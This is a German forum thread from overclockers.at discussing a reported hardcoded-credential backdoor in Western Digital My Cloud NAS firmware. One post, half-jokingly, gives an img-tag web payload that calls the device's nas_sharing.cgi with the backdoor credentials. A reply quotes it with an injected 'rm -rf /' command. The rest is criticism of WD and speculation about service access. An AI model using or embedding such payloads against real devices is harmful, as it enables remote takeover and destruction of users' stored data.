My Cloud: Netzwerkspeicher von Western Digital via Backdoor angreifbar

Seite 1 von 1 - Forum: Storage & Memory auf overclockers.at

URL: https://www.overclockers.at/storage-memory/my-cloud-netzwerkspeicher-von-western-digital-via-backdoor-angreifbar_250490/page_1 - zur Vollversion wechseln!

enjoy schrieb am 06.01.2018 um 08:28

My Cloud: Netzwerkspeicher von Western Digital via Backdoor angreifbar

Besitzer eines "My Cloud"-Netzwerkspeichers sollten diesen bis auf weiteres vom Internet trennen: Die Firmware zahlreicher Modelle ermöglicht offenbar das Login mit hardgecodeten Default-Zugangsdaten aus der Ferne. Patches stehen seit langem aus.

Link: www.heise.de

Falls wer von euch ein My Cloud System hat und sein Benutzer-Passwort vergessen hat

Code:

<img src="http://wdmycloud/cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&start=1&count=1;">

vielleicht findet ihr in der Zeile eine Möglichkeit, euch mit Root-User anzumelden

vom Internet trennen, imho

Denne schrieb am 06.01.2018 um 11:23

Hardgecodete Default-Zugangsdaten :bash: Wie zum Teufel kann man zur heutigen Zeit noch auf so eine Idee kommen?

Dreamforcer schrieb am 06.01.2018 um 16:26

nice, erst die cams jetzt das, was da wohl noch alles kommen wird

Hubman schrieb am 06.01.2018 um 16:35

Zitat aus einem Post von Denne
Hardgecodete Default-Zugangsdaten Wie zum Teufel kann man zur heutigen Zeit noch auf so eine Idee kommen?

WD ist ja ein recht neues startup und der praktikant hat etwas rumgespielt....

Produktrelease war dann zu früh, kann passieren

MaxMax schrieb am 06.01.2018 um 16:59

naja, aber brauchen die servicetechniker von WD nicht im falle der garantie irgendeinen rootzugang zum system?

Smut schrieb am 06.01.2018 um 17:09

Zitat aus einem Post von MaxMax
naja, aber brauchen die servicetechniker von WD nicht im falle der garantie irgendeinen rootzugang zum system?

Aber bitte nur lokal über einen extra Port. Remote ist sowas ein absolutes nogo und einfach nicht notwendig. schon aus Eigenschutz will man als unternehmen idr soetwas nicht haben außer es ist für die Funktionalität des Services notwendig - dann muss man die Authentifizierung sowie deren Merkmale aber top top schützen.

Dreamforcer schrieb am 06.01.2018 um 17:41

Zitat aus einem Post von MaxMax
naja, aber brauchen die servicetechniker von WD nicht im falle der garantie irgendeinen rootzugang zum system?

denk das wird der hintergrund sein, aber wie smut ja schon sagt, so ists halt a bissi blöd.

wergor schrieb am 06.01.2018 um 18:26

Zitat aus einem Post von enjoy
;rm+-rf+/;"